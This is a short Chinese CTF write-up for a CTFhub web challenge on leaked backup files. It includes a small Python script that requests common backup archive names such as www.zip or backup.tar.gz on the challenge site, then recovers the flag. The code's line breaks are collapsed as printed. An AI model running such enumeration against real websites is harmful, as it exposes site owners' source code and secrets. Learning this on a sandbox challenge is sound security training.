CTFhub-Web-信息泄露-备份文件下载-网站源码

题目信息

解题过程

无脑爆破（笑
写个python脚本

import requests
#这里的url是你的地址
url = "http://challenge-67a05a3755f2610d.sandbox.ctfhub.com:10800/"list1 = ['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp']
list2 = ['tar', 'tar.gz', 'zip', 'rar']
for i in list1:for j in list2:url_final = url + "/" + i + "." + jr = requests.get(url_final)print(str(r) + "+" + url_final)

运行后得到结果：

下载这个zip,得到

点开txt发现啥都没有，把这个文件名放到刚刚的网址后得到：

这里就是我们需要的flag!